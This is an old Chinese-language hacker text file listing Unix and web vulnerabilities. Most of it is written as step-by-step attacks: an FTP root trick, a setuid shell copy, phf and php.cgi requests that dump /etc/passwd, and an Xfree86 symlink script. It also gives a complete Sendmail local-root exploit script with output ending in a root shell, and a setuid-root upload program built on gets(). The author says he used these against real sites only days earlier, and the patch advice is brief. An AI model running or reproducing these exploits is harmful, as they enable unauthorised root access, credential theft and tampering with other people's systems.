一些系统漏洞

                                 一些系统漏洞

    这一份 System Holes List 是一些由国外站台或是 NewsGroup 收集的一些资讯 , 系统的漏洞一直被玩家抓出来 , 黑客们也经由一些系统的漏洞入侵电脑 , 如果你是一个 ISP 或你有机器连接到 InterNet 上 , 这些资讯你就非读不可了 ! 有些资讯我并不会写得太清楚 , 如果你自己的系统是属于这些漏洞版本 , 快将它补一补 !! 如果你发现了新的 BUG, 请一定来信告诉我！
--------------------------------------------------------------------------------

#1 FTP 入侵法 ?? 不太实用的方法 !!

[1] 连接到 FTP Server.
[2] 当系统要求你输入 User Name 时 [Enter] 不管它
[3] Password 输入 --> "quote user ftp"
[4] 接著再输入 --> "quote cwd ~root"
[5] 再输入 --> "quote pass ftp"

这种方法似乎只能用在很老旧的FTP Server上 , 以国内目前的机器应该都不会成功的 , 如果你想要试试的话 , 找找国外大学的FTP Server试试看吧 !! 依照上面的步骤会产生甚么样的结果 ?? Hee..he.. 你就是 root 啦 !!
--------------------------------------------------------------------------------

#2 Linux 1.2.13 漏洞之一 ?? 成为 root 吧 !!

Linux 1.2.13 有许多的漏洞 , 如果你所使用的版本是较新的话 , 你大可放心 , 不然你也可以依照下面的方法试试你的系统 !!

[1] Telnet 到 yournet.net
[2] Login 之后输入 --> "finger @yournet.net"
[3] 再 --> "finger root@yournet.net" 等 root 来 login
[4] 用 WWW Browser 连到 www.yournet.net
[5] Location 输入 --> "www.yournet.net/cgi-bin/nph-test-cgi/*"
[6] 回到 Telnet 软体 --> "cp /bin/sh /tmp/.sh"
[7] 再输入 --> "chmod 4755 /tmp/.sh" (You're root now!!)

    至于其它 Linux 的 System Holes, 有机会再慢慢谈罗 !! 当然已经有许多文件讲到了 !!
--------------------------------------------------------------------------------

#3 可以用 WWW Browser 抓 /etc/passwd ???? 那当然 !!

[1] 用 WWW Browser 连到 yournet.net
[2] Location 输入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
[3] 接著如果出来一份像 Report 的画面的话 , 接著输入 /cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 发生了甚么事 ?? etc/passwd 在你的浏览器中 " 显示 " 出来了 !! 快点 Save 吧 !!

这个方法管不管用 ?? 依各系统所使用的 WWW Server 软体不同而有差异 , 所以如果你在选购 WWW Server 软体的时候也请注意一下它的安全性 , 不一定名牌的就好 , 像这个 Hole... 当然这个方法曾经管用过 , 至少两天前还试过它可以破解一两个 " 网路咖啡 " 的站台 (<--- 又是 , 安全性值得讨论 )!!
--------------------------------------------------------------------------------

#4 Xfree86 3.1.2 有个漏洞能让别人删除 " 任何 " 档案 ?? 是的 ! 包括 etc/passwd

用这个 Script 试试看 ...

--- cut here, start code exploit.sh --------------------
!/bin/sh
echo Running exploit to check the Xfree86 3.1.2 hole!
echo Creating file called /tmp/blah which will contain a few words.
echo "This version is NOT exploitable!" >/tmp/blah
ln -s /tmp/blash /tmp/.tX0-lock
startx
echo Now Check /tmp/blah and if it says:
echo \"This version is NOT exploitable!\"
echo then the version you have is not exploitable!
echo Otherwise, it should have a few numbers, then it is exploitable!
--- cut here, end of code exploit.sh -------------------

要怎么补这个漏洞呢 ????

[1] 将它设成 superuser 才能执行 ! 用 chmod 4700 指令 .
[2] 作一个 group, 只将值得相信的人加入此 group, 使该档案属此 group 才能执行 .
[3] 更新新版的 Xfree86, 可在 http://www.x.org 下载 .
--------------------------------------------------------------------------------

#5 CGI Hole

你是不是用 phf 的 bug 都抓不到 /etc/passwd 呢??? Try this

[1] 打开你的 Browser
[2] 连到 www.yournet.net
[3] 在 Location 输入 http://www.yournet.net/cgi-bin/php.cgi?/etc/passwd
[4] 发生了甚么事?? /etc/passwd 在你的浏览器中 “显示” 出来了!! 快点 Save 吧!!

Phf 的 bug 在本人的观查中以 NCSA 的成功最多, 那 Apache/1.2.0., CERN/3.0A., 也有过成功的例子, 不过有的站都已经写了程序, 如果你用 proxy 去抓的话, 还是会把你本来的 IP 的抓出来, 那他们会跟你的 ISP 说, 那 ISP 会处分你, 本人就被取消帐号过 .......... 唉 ...... 我的固定 IP!
--------------------------------------------------------------------------------

#6 SendMail Hole

适用于版本 8.7-8.8.2 for Linux, FreeBSD, 和其它的 UNIX 系统。

$ telnet localhost 25 <----------打
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 localhost ESMTP Sendmail 8.7.5/8.7.3; Thu, 25 Dec 1997 15:17:46 +0800
quit <----------确定版本,是8.7到8.8.2中的版本,然後离开
221 localhost closing connection
Connection closed by foreign host.
$ cat >send.sh <--------照打
----------------------------send.sh开始-------------------------------------
#/bin/sh
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"
|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type: /tmp/sh"
-------------------------------send.sh结束------------------------------------
$ chmod 755 send.sh <------------变可执行档
$ ./send.sh <------------执行
Now type: /tmp/sh
$ /tmp/sh <---------照打
# whoami <---------看看你是谁
root <---------到手啦!!!

--------------------------------------------------------------------------------

#7 让任何人upload档案在任何目录下

root 身份下来做 (Must be root!)

$ cat >install <---------编辑一个叫install的shell script
#! /bin/csh -f }
cc upload.c }
cp a.out upload }
chown root upload } 内容
chmod 755 upload }
chmod u+s upload }
^d (ctrl+d) <--------存档
$ cat >upload.c <---------主档
/************* Chen. 1/14/1997 ****************/
/* Copyright Reserved 521973 */
/**********************************************/
#include <stdio.h>
main()
{ char filename[48];
printf( "This program will upload up.txt ASCII file to specified file\n"
);
printf( "Chen ZhengDong Copyright Reserved\n" );
printf( "Where to upload (include path and filename)? " );
gets( filename );
upload( filename );
}
int upload( filename )
char *filename;
{ FILE *fp,*outp;
char c;
fp=fopen( "up.txt","r" );
outp=fopen( filename,"w" );
if( fp== NULL )
{ printf( "file not exist." );
return 0;
}
for( ;; )
{
c= fgetc( fp );
if feof( fp ) break;
printf( "%c",c );
fputc( c, outp );
}
fclose( fp );
fclose( outp );
return 1;
}
-----------------------------end--------------------------------------------
# chmod 755 install <----------- 让他可执行
#./install <----------- run it !
--------------------------------------------------------------------------------